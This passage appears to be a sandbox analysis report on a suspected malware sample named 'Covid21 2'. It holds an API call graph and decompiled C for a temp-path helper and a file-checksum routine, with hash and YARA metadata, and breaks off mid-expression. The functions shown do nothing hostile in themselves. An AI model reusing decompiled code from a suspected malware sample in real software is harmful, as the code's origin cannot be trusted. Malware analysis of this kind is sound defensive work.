12937->12612 12939 403188 12938->12939 12941 403139 12938->12941 12939->12613 12940 40316e HeapFree 12940->12941 12941->12939 12941->12940 12943 4077a2 12942->12943 12944 40776f RtlReAllocateHeap 12942->12944 12943->12625 12944->12943 12946 4075b3 RtlReAllocateHeap 12945->12946 12947 407597 RtlAllocateHeap 12945->12947 12948 4075d4 12946->12948 12947->12948 12948->12628 12953 40642d 12949->12953 12951 403969 GetCommandLineA 12952 401307 GetModuleHandleA 12951->12952 12952->12408 12952->12427 12953->12951 12960 407600 12954->12960 12956 4020d9 FindResourceA 12956->12648 12956->12649 12958 40755b HeapFree 12957->12958 12959 4013b1 12957->12959 12958->12959 12959->12412 12959->12413 12961 407647 12960->12961 12962 40760a strlen RtlAllocateHeap 12960->12962 12961->12956 12962->12961 12964 407750 RtlReAllocateHeap 12963->12964 12965 405ec5 GetTempPathA LoadLibraryA 12964->12965 12966 405f00 12965->12966 12967 405ee2 GetProcAddress 12965->12967 12966->12656 12968 405ef2 GetLongPathNameA 12967->12968 12969 405ef9 FreeLibrary 12967->12969 12968->12969 12969->12966 12971 403e5d 12970->12971 12972 407750 RtlReAllocateHeap 12971->12972 12973 403e7a 12972->12973 12974 403e80 memcpy 12973->12974 12975 401c43 12973->12975 12974->12975 12975->12661 12976->12664 12978 405f22 strncpy strlen 12977->12978 12980 401c6d 12977->12980 12979 405f52 CreateDirectoryA 12978->12979 12979->12980 12980->12669 12983 406636 12982->12983 12984 40664d 12982->12984 12988 4067da RtlAllocateHeap 12983->12988 12985 406657 RtlReAllocateHeap 12984->12985 12987 406185 CreateFileA 12984->12987 12985->12987 12987->12692 12987->12693 12989 4067f0 12988->12989 12989->12987 12991 406365 12990->12991 12992 406345 SetFilePointer 12990->12992 12993 406370 12991->12993 12994 4063de 12991->12994 12992->12991 12996 4063a3 12993->12996 13000 406389 memcpy 12993->13000 13001 405f90 12994->13001 12996->12701 12998 40640b memcpy 12998->12701 12999 4063eb WriteFile 12999->12701 13000->12701 13002 405fa1 WriteFile 13001->13002 13003 405fc5 13001->13003 13002->13003 13003->12998 13003->12999 13005 40322e 13004->13005 13006 403292 13005->13006 13008 403287 strncpy 13005->13008 13007 407750 RtlReAllocateHeap 13006->13007 13009 403299 13007->13009 13008->13006 13010 4032aa 13009->13010 13011 40329f strncpy 13009->13011 13010->12721 13011->13010 13013 406324 13012->13013 13014 4062e0 13012->13014 13013->12756 13014->13013 13015 406312 WriteFile 13014->13015 13016 406304 13014->13016 13015->13013 13017 406330 5 API calls 13016->13017 13018 40630c 13017->13018 13018->12756 13038 4064a1 13019->13038 13022 403fcd 13022->12756 13024 406973 CreateFileA 13023->13024 13025 406b14 13023->13025 13024->13025 13026 40699c RtlAllocateHeap 13024->13026 13025->12756 13027 406b0c FindCloseChangeNotification 13026->13027 13029 4069be 13026->13029 13027->13025 13028 4069c0 ReadFile 13028->13029 13029->13028 13029->13029 13030 406afb HeapFree 13029->13030 13030->13027 13043 403440 13031->13043 13033 4023dd 13034 4035f0 13033->13034 13035 4035fd 13034->13035 13036 407750 RtlReAllocateHeap 13035->13036 13037 403664 13036->13037 13037->12728 13039 406526 RtlAllocateHeap 13038->13039 13042 403fb2 memset 13038->13042 13041 406567 RtlAllocateHeap 13039->13041 13039->13042 13041->13042 13042->13022 13044 40344f 13043->13044 13045 407750 RtlReAllocateHeap 13044->13045 13047 403496 13045->13047 13046 40358c 13046->13033 13047->13046 13047->13047 13048 403500 RtlAllocateHeap 13047->13048 13050 403520 13047->13050 13048->13050 13049 403579 HeapFree 13049->13046 13050->13046 13050->13049 13052 407661 strlen 13051->13052 13053 4076ca 13051->13053 13054 407694 RtlReAllocateHeap 13052->13054 13055 407678 RtlAllocateHeap 13052->13055 13056 4076d2 HeapFree 13053->13056 13057 4076b5 13053->13057 13054->13057 13055->13057 13056->13057 13057->12807 13059 4038bc EnumWindows 13058->13059 13062 4038cd 13058->13062 13060 4036aa 13059->13060 13068 40384e GetWindowThreadProcessId GetCurrentThreadId 13059->13068 13065 40390d GetForegroundWindow 13060->13065 13061 4038da GetCurrentThreadId 13061->13062 13063 4038e9 EnableWindow 13061->13063 13062->13060 13062->13061 13064 40681d HeapFree 13063->13064 13064->13062 13066 4036bb MessageBoxA 13065->13066 13067 40391e GetWindowThreadProcessId GetCurrentProcessId 13065->13067 13066->12813 13067->13066 13069 4038ac 13068->13069 13070 40386c IsWindowVisible 13068->13070 13070->13069 13071 403877 IsWindowEnabled 13070->13071 13071->13069 13072 403882 GetForegroundWindow 13071->13072 13072->13069 13073 40388c EnableWindow 13072->13073 13074 4067da RtlAllocateHeap 13073->13074 13075 4038a1 GetCurrentThreadId 13074->13075 13075->13069 13077 40662c 2 API calls 13076->13077 13078 404b24 sprintf 13077->13078 13080 404b55 13078->13080 13081 404b5c memset RegisterClassA 13078->13081 13080->13081 13082 404bb6 AdjustWindowRect 13081->13082 13084 404c25 13082->13084 13085 404c73 13084->13085 13086 404c3c GetSystemMetrics 13084->13086 13089 404cc9 CreateWindowExA 13085->13089 13092 404c89 GetWindowRect 13085->13092 13093 404c7f GetActiveWindow 13085->13093 13087 404c49 13086->13087 13088 404c4c GetSystemMetrics 13086->13088 13087->13088 13097 404c63 13088->13097 13090 404d01 SetPropA 13089->13090 13091 404dbc UnregisterClassA 13089->13091 13095 404d17 ShowWindow 13090->13095 13096 404d39 RtlAllocateHeap CreateAcceleratorTableA 13090->13096 13094 4066bb 2 API calls 13091->13094 13092->13097 13093->13089 13093->13092 13098 40153f 13094->13098 13095->13096 13096->13098 13099 404daa 13096->13099 13097->13089 13098->12824 13102 407ee3 13099->13102 13103 407ef6 13102->13103 13104 407f15 sprintf 13103->13104 13105 407f39 GetPropA 13104->13105 13106 407f5d GetPropA 13104->13106 13105->13106 13107 407f6c 13106->13107 13108 407f9e 13106->13108 13109 407f81 13107->13109 13110 407f73 HeapFree 13107->13110 13111 407fc5 13108->13111 13112 407fa9 RtlAllocateHeap 13108->13112 13110->13109 13113 407fc8 RtlAllocateHeap SetPropA SetWindowLongA 13111->13113 13112->13113 13115 4041e0 13114->13115 13116 4041f0 memset 13115->13116 13117 404243 CreateWindowExA 13115->13117 13116->13117 13119 404291 13117->13119 13123 401563 13117->13123 13120 40662c 2 API calls 13119->13120 13121 40429f 13120->13121 13124 4047bb 13121->13124 13123->12827 13125 4047cd 13124->13125 13126 4047dc SetWindowLongA SetWindowLongA SetPropA SendMessageA 13125->13126 13127 40482d 13126->13127 13127->13123 13129 404502 13128->13129 13130 404514 memset 13129->13130 13131 40454b CreateWindowExA 13129->13131 13130->13131 13133 40458f 13131->13133 13137 4015ae 13131->13137 13134 40662c 2 API calls 13133->13134 13135 40459d 13134->13135 13136 4047bb 4 API calls 13135->13136 13136->13137 13137->12840 13139 404f38 13138->13139 13140 404f69 13139->13140 13141 404f50 HeapFree 13139->13141 13142 404f5a HeapFree 13139->13142 13143 404fa3 13140->13143 13144 404f74 HeapFree 13140->13144 13141->13142 13142->13140 13145 404ff3 GetMessageA 13143->13145 13146 404fac PeekMessageA 13143->13146 13153 404f9b 13144->13153 13147 404ffd GetActiveWindow 13145->13147 13146->13147 13148 404fbe 13146->13148 13156 405d3c GetKeyState 13147->13156 13149 404fca MsgWaitForMultipleObjects 13148->13149 13148->13153 13151 404fe2 PeekMessageA 13149->13151 13149->13153 13151->13147 13151->13153 13152 40500b 13154 40501f TranslateMessage DispatchMessageA 13152->13154 13155 40500f TranslateAccelerator 13152->13155 13153->12476 13154->13153 13155->13153 13155->13154 13157 405d50 GetKeyState 13156->13157 13158 405daa GetPropA 13156->13158 13157->13158 13159 405d58 GetKeyState 13157->13159 13162 405dbc 13158->13162 13159->13158 13160 405d60 GetKeyState 13159->13160 13160->13158 13161 405d68 GetFocus GetClassNameA _strncoll 13160->13161 13161->13158 13163 405d94 GetFocus SendMessageA 13161->13163 13162->13152 13163->13158 13163->13162 13165 4073c0 13164->13165 13166 407455 memset 13165->13166 13166->12864 13168 403115 HeapFree 13167->13168 13169 401d90 13167->13169 13168->13169 13169->12873 13171 4024c8 13170->13171 13171->13171 13172 403100 2 API calls 13171->13172 13173 4024e1 13172->13173 13174 403110 HeapFree 13173->13174 13175 4024f9 13174->13175 13176 4030a0 RtlAllocateHeap 13175->13176 13177 402508 13176->13177 13178 403110 HeapFree 13177->13178 13179 402520 13178->13179 13180 4030a0 RtlAllocateHeap 13179->13180 13181 40252f 13180->13181 13182 407550 HeapFree 13181->13182 13183 40275c 13182->13183 13184 403110 HeapFree 13183->13184 13185 402766 13184->13185 13186 403110 HeapFree 13185->13186 13187 401dfd 13186->13187 13187->12885 13189 403ec8 13188->13189 13190 403eeb 13188->13190 13191 403ed1 RtlReAllocateHeap 13189->13191 13192 403ee3 13189->13192 13190->12900 13191->12900 13193 403dc0 RtlAllocateHeap 13192->13193 13194 403ee8 13193->13194 13194->12900 13196 40662c 2 API calls 13195->13196 13197 406077 13196->13197 13198 40609a 13197->13198 13199 40607e CreateFileA 13197->13199 13201 4060bc 13198->13201 13202 40609f CreateFileA 13198->13202 13200 4060f9 13199->13200 13203 406149 13200->13203 13206 406106 RtlAllocateHeap 13200->13206 13201->13200 13204 4060c1 CreateFileA 13201->13204 13202->13200 13207 40615c 13203->13207 13209 4066bb 2 API calls 13203->13209 13204->13200 13205 4060e3 CreateFileA 13204->13205 13205->13200 13208 40613b 13206->13208 13207->12930 13208->12930 13209->13207

                                  Executed Functions

                                  Function 00405EB2, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 39libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 82%
                                  			E00405EB2(void* __eflags, intOrPtr _a4) {
				CHAR* _t3;
				void* _t6;
				_Unknown_base(*)()* _t7;
				long _t9;
				long _t10;
				CHAR* _t11;
				struct HINSTANCE__* _t14;

				_t3 = E00407750(0x104, _a4); // executed
				_t11 = _t3;
				_t10 = GetTempPathA(0x104, _t11);
				_t14 = LoadLibraryA("Kernel32.DLL");
				if(_t14 != 0) {
					_t7 = GetProcAddress(_t14, "GetLongPathNameA");
					if(_t7 != 0) {
						_t9 =  *_t7(_t11, _t11, 0x104); // executed
						_t10 = _t9;
					}
					FreeLibrary(_t14);
				}
				_t6 = E004077F0(0x104 - _t10);
				_t11[_t10] = 0;
				return _t6;
			}










                                  0x00405ec0
                                  0x00405ec5
                                  0x00405ed4
                                  0x00405edc
                                  0x00405ee0
                                  0x00405ee8
                                  0x00405ef0
                                  0x00405ef5
                                  0x00405ef7
                                  0x00405ef7
                                  0x00405efa
                                  0x00405efa
                                  0x00405f03
                                  0x00405f08
                                  0x00405f10

                                  APIs
                                    • Part of subcall function 00407750: RtlReAllocateHeap.NTDLL(029A0000,00000001,029A06F0,000040FF), ref: 00407797
                                  • GetTempPathA.KERNEL32(00000104,00000000,00000104,004013CA,?,?,?,00000000,00401C13,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 00405EC9
                                  • LoadLibraryA.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401C13,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013CA,OPS,00000000), ref: 00405ED6
                                  • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405EE8
                                  • GetLongPathNameA.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401C13,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013CA), ref: 00405EF5
                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401C13,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013CA,OPS,00000000), ref: 00405EFA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTemp
                                  • String ID: GetLongPathNameA$Kernel32.DLL
                                  • API String ID: 752937943-822094646
                                  • Opcode ID: a669cfd6c78251049e6fa13bc80549985cfc2c20c01295e95ea53c2998d511aa
                                  • Instruction ID: 2fdf95b4f3bb88d5f25b72bcecc505d16b40b69b5bc7ba3a5d03bddc1f48918c
                                  • Opcode Fuzzy Hash: a669cfd6c78251049e6fa13bc80549985cfc2c20c01295e95ea53c2998d511aa
                                  • Instruction Fuzzy Hash: A5F0BE322012146BC32127B5AD4CF6B3A6CDB82791B04003AFA04B3282CABD9C1182BE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406960, Relevance: 7.6, APIs: 5, Instructions: 128memoryfileCOMMONCrypto
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 347 406960-40696d 348 406973-406996 CreateFileA 347->348 349 406b15-406b1d 347->349 350 406b14 348->350 351 40699c-4069b8 RtlAllocateHeap 348->351 350->349 352 406b0c-406b13 FindCloseChangeNotification 351->352 353 4069be-4069bf 351->353 352->350 354 4069c0-4069df ReadFile 353->354 355 4069e5-4069ea 354->355 356 406ace-406ad0 354->356 357 4069f0-406ac0 355->357 358 406ad2-406aed 356->358 359 406aef-406af5 356->359 357->357 360 406ac6-406aca 357->360 358->358 358->359 359->354 361 406afb-406b0b HeapFree 359->361 360->356 361->352
                                  C-Code - Quality: 100%
                                  			E00406960() {
				CHAR* _t32;
				void* _t35;
				void* _t36;
				void* _t40;
				signed char* _t42;
				signed char* _t43;
				signed char* _t44;
				signed char* _t45;
				signed char* _t46;
				signed char* _t47;
				void* _t50;
				signed int _t94;
				unsigned int _t97;
				void* _t98;
				unsigned int _t100;
				signed int _t102;
				signed int _t103;
				void* _t106;
				unsigned int _t109;
				void* _t110;

				_t32 =  *(_t110 + 4);
				_t103 = _t102 | 0xffffffff;
				if(_t32 != 0) {
					_t35 = CreateFileA(_t32, 0x80000000, 1, 0, 3, 0x80, 0); // executed
					_t50 = _t35;
					 *(_t110 + 8) = _t50;
					if(_t50 != 0xffffffff) {
						_t36 =  *0x40b13c; // 0x27d0000
						_t106 = RtlAllocateHeap(_t36, 0, 0x1000);
						 *(_t110 + 0x10) = _t106;
						if(_t106 != 0) {
							do {
								ReadFile(_t50, _t106, 0x1000, _t110 + 0x20, 0); // executed
								_t97 =  *(_t110 + 0x1c);
								_t40 = _t106;
								_t100 = _t97;
								if(_t97 >= 8) {
									_t109 = _t97 >> 3;
									do {
										_t42 = _t40 + 1;
										_t43 =  &(_t42[1]);
										_t44 =  &(_t43[1]);
										_t45 =  &(_t44[1]);
										_t46 =  &(_t45[1]);
										_t47 =  &(_t46[1]);
										_t94 = ((((((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t44[1] & 0x000000ff ^ (((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t45[1] & 0x000000ff ^ ((((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t44[1] & 0x000000ff ^ (((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t46[1] & 0x000000ff ^ (((((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t44[1] & 0x000000ff ^ (((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t45[1] & 0x000000ff ^ ((((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t44[1] & 0x000000ff ^ (((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + 